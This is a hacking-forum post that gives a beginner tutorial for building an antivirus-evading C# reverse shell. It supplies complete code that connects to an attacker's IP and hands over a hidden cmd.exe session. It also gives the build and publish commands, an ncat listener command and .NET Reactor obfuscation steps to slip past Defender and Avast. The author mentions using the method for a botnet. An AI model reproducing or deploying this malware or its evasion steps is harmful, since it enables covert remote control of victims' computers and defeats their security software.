05-27-2023, 05:50 PM (This post was last modified: 05-27-2023, 05:55 PM by Xprogrammer.)
Simple C# FUD reverse shell
Hi, I'm Xprogrammer from CBB!
I'm sharing a simple and lazy noob way to create FUD reverse shell no skills required detection (1/69).
There is many ways and script to achieve this, but I'm sharing the simplest one
Required softwares
Won't lie I'm using Windows to create malwares so you will need :
- .NET SDK
- .NET reactor
- C# compiler
- Basic IDE (e.g VScode)
- Netcat
Required skills
(None)
Let's begin
I find by googling that using cmd.exe to run the process will make the program almost FUD instead of making a code that directly connect to the host So here is the simple C# code :
Sorry for indentation but I had hard time formatting this post ....
Code:
[/align]
[align=left]using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("<attacker_ip>", 1234))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}[/align]
[align=left]
Since I want to keep this "tutorial" very friendly, I am just going to explain how to compile the code and make it even more FUD with .NET reactor :
- Create a project folder open it with dotnet and run
Code:
dotnet new console
- Create a Program.cs file with the code
- Run
Code:
dotnet build
- You can try running your code using
Code:
dotnet run
- If you open a terminal with you will get the connection
Code:
ncat -lvp 1234*
*nc is on linux and ncat is on Windows
To compile, you can just use this command, make sure you use PublishSingleFile so that you will be able to deploy your payload easily with a single exe :
Code:
dotnet publish --output <output_path> --configuration Release --self-contained true --runtime win-x64 -p:PublishSingleFile=true
Now that's sick, with the current exe you can Bypass defender runtime but some AV like Avast will still detect it, here is how to fix.
Open .NET Reactor, it's a nice program with a lot of options to obfuscate your .NET malware and assembly editor.
Open your compiled exe on the "Main Assembly" check string encryption, obfuscation, anti ILDASM and finally "control flow obfuscation" and set a high number.
For smart curious people who want to know what are they doing you can read these docs : https://www.eziriz.com/help/definitions/anti_debug/
I used this to bypass AV for the botnet I'm creating FUD runtime IDS/IPS....
:angel: And by a spiritual magic move you will click on protect and your FUD reverse shell will be generated.
Stealth - FUD - SIMPLE
Xprogrammer .
We are Light Hat Arsenal, we are hackers for the light !